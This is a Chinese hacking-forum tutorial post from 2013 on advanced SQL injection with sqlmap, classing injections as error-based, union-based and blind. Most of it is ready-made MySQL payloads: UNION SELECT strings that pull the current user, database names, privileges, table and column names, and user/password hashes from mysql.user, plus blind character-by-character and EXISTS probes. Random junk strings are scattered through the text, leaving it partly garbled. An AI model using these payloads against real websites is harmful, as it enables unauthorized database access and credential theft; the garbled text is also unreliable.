中国网络渗透测试联盟

标题: sqlmap高级注入 [打印本页]

作者: admin    时间: 2013-7-16 20:31
标题: sqlmap高级注入
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
" |+ a; v$ n* `6 B$ A3 O ) _( Q! r( T  C
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表" }  z$ K1 ?, \: _4 ~
+ K" v. Y  G" |: S) U  O
分类标准        分类        备注3 B3 P+ b- T6 c; ~9 J0 t
按字段类型        整型注入,字符型注入        & W' y5 N. r( z. B6 V+ \8 w- }
按出现的位置        get注入,post注入,cookie注入,http header注入        8 P0 V/ }2 E  D8 P& P, J
然而高级注入是这样的$ [3 ?) a+ v, z7 J! v/ r
/ w4 w, d! p+ U( H; z4 a
高级注入分类        条件; b0 i7 s7 c2 F/ t) A6 Q8 D
error-based sql        数据库的错误回显可以返回,存在数据库,表结构$ L5 V1 ?& v7 V  h; @# c+ a3 H9 O) B
union-based sql        能够使用union,存在数据库,表结构
3 f2 G; E  i. @blind sql        存在注入
! N5 N, s8 X; s我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
7 R' X: I7 [9 t
7 \) E; Z$ C. L好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火5 [5 t4 d- s1 t) j8 K9 X

5 T1 Q! C$ R2 s( Y. L: k3 S附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。; M1 |, L; g* o9 I4 o7 C) M# f: f

, o. Z' H! h/ O9 ^这里用mysql说明' Q) Q" g% s0 R% y+ h! O2 h9 H
# |! D/ B2 t: c4 C& m6 L
e注入坛子里很多了,请看戳我或者再戳我
/ t1 V% Z" Z. |: r+ x! S: E. F& J# Q + \( \  a5 ]$ W% J
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的3 {$ i8 I3 q! I/ K
- C' m6 C3 j, O$ G. q
获取当前数据库用户名" B# l8 L0 ~( V! ~0 ~0 S* H

7 Q( s" S! `# ^; R4 g- rUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C5 C4 z2 L4 a( A; M
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL2 T# m  x9 P5 ~, h% c; P
L, NULL#
9 V7 z% b4 C  f0 y7 s4 g- s1 _注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。4 K0 T; u- u, l$ O' E( K5 v
2 e) @4 r7 b) N* Q& |
获取数据库名
- u4 W$ \1 e6 s: _  Z) N9 v3 R4 _
5 {4 u; i& c# P# v# R5 f2 [UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
* \; c( _: K# j% f& @" M8 U获取所有用户名; d9 S8 v: `- u  j; L

2 W2 q. z8 o, s4 |- @3 f4 ]UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#6 I& D$ Y3 W8 d% H
查看当前用户权限- R5 t/ u/ p( S' |8 O2 J

# h2 }! L3 f0 P9 e; _4 G/ mUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
1 w/ F, T; n* }. {: ~尝试获取密码,当然需要有能读mysql数据库的权限
' V& s( K8 P4 \5 A, d$ S$ c   z0 A3 S  J5 W; W5 J; U+ C
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#: @5 z' `6 L2 E  |5 J& W$ e
获取表名,limit什么的自己搞啦
  I- M( _4 ^5 g. `# ^+ z; q" E5 f) |
- a& Y- F/ x4 y4 I+ jUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
2 d# D+ h) U6 h9 f获取字段名及其类型. a: E) T3 p/ q: d4 M
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#1 T! |; t9 h2 M2 F% m

  @0 z4 c1 |. |1 i$ lb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
+ O1 Y( ?, Q. ?+ \* X8 V6 G# d ( K- l- Q' x0 l& W
如:, [5 \  o# \% e4 j& `) M
获取当前用户名
9 ]; L5 ~) Z* X7 @; O! P - ?: f. V* s! U
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 1160 `9 Z9 i4 L0 e( Q! ^
获取当前数据库
9 h, J# n7 }! S# y" L! E" t- ]
: k4 d% x+ D! d9 I. e! C3 hAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106/ h/ \6 z/ {6 ?
获取表名
4 O& E. Z1 A, p# l - z2 D& O" v3 v- i
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
) K* i9 H2 j0 |" n" G: n! K! a$ [/ X获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
# Z" b& B" K2 |' u2 Q4 E回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。" Y5 F1 `- w2 G5 {& @3 U8 w
爆表/ q8 f+ ~8 s: l- {+ A) e  d. b
, N5 Y5 b" m: \+ h9 U9 h
AND EXISTS(select * from table)6 Z6 E& {/ d' }
爆字段: G" U% O2 w$ r  b6 V

; g  v1 r) ~& y5 i& Q4 m5 c5 nAND EXISTS(select pwd from table)
: I  u4 g% d1 c# ?. p盲注的变化就比较多了,由于篇幅,只是举个例子而已。
- {1 _5 `; l* A! I- p/ m( @ 3 O. E( b, p6 P( Y  v. N
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。5 |( B8 j3 ?2 K. c, O





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2